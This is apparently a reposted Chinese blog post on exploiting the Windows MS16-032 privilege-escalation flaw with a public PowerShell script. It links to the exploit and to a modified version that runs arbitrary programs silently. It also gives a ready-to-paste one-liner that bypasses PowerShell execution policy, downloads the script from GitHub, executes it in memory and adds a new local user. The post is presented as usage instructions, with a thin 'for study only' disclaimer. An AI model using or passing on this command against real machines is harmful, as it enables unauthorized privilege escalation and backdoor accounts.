MS16-032 windows本地提权

感谢您访问“平安在线”技术网,本站免费更新大量的技术软件,已经培训教程,如果您喜欢我们的网站,希望您能可以分享给您的好友,感谢您的支持!  本站默认[点击查看解压密码]

有个公开的powershell脚本可以进行提权。

exploit-db的详情:

https://www.exploit-db.com/exploits/39574/

试用系统:

Tested on x32 Win7, x64 Win8, x64 2k12R2

https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1

1.gif

为了方便使用,对这个脚本进行了简单的修改,可以执行任意程序,并可以添加参数执行(全程无弹框)脚本地址为:

https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1

使用方式如下:

添加用户:

2.gif

运行某程序:

3.gif

远程加用户:

直接执行如下命令,可进行提权并添加用户:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1'');Invoke-MS16-032 -Application cmd.exe -commandline ''/c net user evi1cg test123 /add''"

4.gif

本站资源来自互联网收集 仅供用于学习和交流 我们尊重任何软件和教程作者的版权 请遵循相关法律法规 本站一切资源不代表本站立场